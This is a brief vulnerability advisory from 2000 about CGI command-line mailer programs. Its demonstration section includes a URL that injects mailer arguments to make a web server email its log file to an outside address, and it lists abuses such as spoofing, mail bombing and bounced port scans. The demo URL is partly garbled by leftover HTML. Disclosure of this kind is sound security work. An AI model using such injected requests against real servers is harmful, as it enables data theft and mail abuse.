Reported December 12, 2000 by XATO

VERSIONS AFFECTED

DESCRIPTION

Multiple vulnerabilities have been discovered in command-line mailers. Vulnerabilities range from Denial of Service (DoS) attacks to information leakage and the writing and retrieving of unauthorized data.

DEMONSTRATION

If the mailer software is located in the /cgi-bin directory on the Web server, a user can launch it with the following URL:

http://yourserver/cgi-bin/mailer.exe  

By adding a "-h" to the URL, as seen below, a user obtains a list of available options built into the mailer:

http://yourserver/cgi-bin/mailer.exe?-h

The following command causes the mailer software to email the malicious user any file specified. In the case of this example, the Web server emails log files.

-f%20joe@example.com%20-t%20me@example">http://yourserver/cgi-bin/mailer.exe?-f%20

joe@example.com%20-t%20me@example. com%20-a%20c:\logs\web.log 

Other issues discovered with the command-line mailer programs include the mailers also let malicious users specify the recipient and the sender, letting anyone use the server for unsolicited commercial email (UCE), flooding, mail bombing, resource draining, mail spoofing, and DoS. 

Additionally, other problems include the ability to let INI and log files reside in the same directory as the mailer; override the default settings; modify hidden form variables; exploit debug modes; monitor all mail sent through the server; use the mailer as a bounce point for port scans; use the mailer as a bounce point for brute-force password attacks.

VENDOR RESPONSE

Check your vendors web site for fix and upgrade information.

CREDIT
Discovered by
XATO